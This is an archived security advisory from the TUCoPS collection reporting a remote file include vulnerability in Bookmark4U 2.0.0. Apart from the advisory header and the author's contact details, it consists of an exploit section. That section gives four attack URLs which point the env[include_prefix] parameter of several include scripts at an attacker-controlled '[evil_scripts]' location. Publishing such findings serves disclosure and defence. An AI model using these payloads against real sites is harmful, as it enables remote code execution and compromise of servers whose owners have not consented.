TUCoPS :: Web :: Apps :: b06-2714.htm

Bookmark4U Remote File Include
Bookmark4U Remote File Include
Bookmark4U Remote File Include


=0D
---------------------------------------------------------------------------=0D
Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities=0D
---------------------------------------------------------------------------=0D
Discovered By SnIpEr_SA=0D
Author    : SnIpEr_SA=0D
Remote  :  Yes  =0D
Local     :  No  =0D
Critical Level : Dangerous=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Application : Bookmark4U=0D
version     : 2.0.0=0D
URL :http://bookmark4u.sourceforge.net/=0D 
... =0D
------------------------------------------------------------------ =0D
Exploit:=0D
~~~~~~~~ =0D
# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]=0D 
# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]=0D 
# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]=0D 
# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]=0D 
=0D
--------------------------------------------------------------------------- =0D
*/=0D
Contact:=0D
 ~~~~~~~~=0D
 SnIpEr_SA=0D
E-mail: selfar2002@hotmail.com=0D 
E-mail: SnIpEr.SA[at]hotMail[dot]com=0D
Homepage: http://www.3asfh.net/ & http://www.lezr.com/=0D 
Greetz: All My Frind=0D
/* =0D
-------------------------------- [ END ] ----------------------------------=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH